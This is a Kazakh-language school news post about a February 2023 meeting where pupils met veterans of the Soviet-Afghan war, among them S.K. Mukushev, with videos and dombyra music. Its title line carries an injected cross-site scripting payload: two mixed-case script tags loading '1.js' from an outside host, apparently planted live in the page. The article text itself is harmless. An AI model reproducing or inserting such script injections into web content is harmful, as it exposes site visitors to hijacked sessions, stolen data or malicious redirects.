«Ауғанның асуында от кешкендер!»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.02.2023
9 ақпан күні мектеп оқушыларымен және Жагыпаров А.С, Абдрахманов Д.С. ұйымдастырған «Ауғанның асуында от кешкендер!» ардагерлермен кездесу кеші өтілді.
Кездесудің мақсаты:
- Оқушыларға Ауған соғысының болу себептерін түсіндіру;
- Отанын құрметтеуге, еркіндікті бағалай білуге, ұлтжанды, елжанды болуға үйрету;
- Бейбітшілік үшін күрескен ерлердің қаһармандығы мен күрескерлік ерліктерін әрқашан есте сақтауға, үлгі ете білуге тәрбиелеу.
Сұрапыл Ауған соғысы туралы мағлұматтар оқылып.
Мукушев Сандыбай Каримгужинович – Зеренді ауылының тұрғыны, соғысқа қатысқан ардагерлерінің бірі.
Бейнеролик көрсетіліп жан кешті ерліктерін айтып талқыға салынды. 5-8 сыныптар аралығында балалар тандалып, әсем домбырамен күйлер орындалды.
Ардагер Мукушев С.К. өзінің бастан кешкен оқиғаларын, майдандағы ереулі жан кешті ерліктерін айтып, оқушыларға өз батасын берді.




Просмотров: 578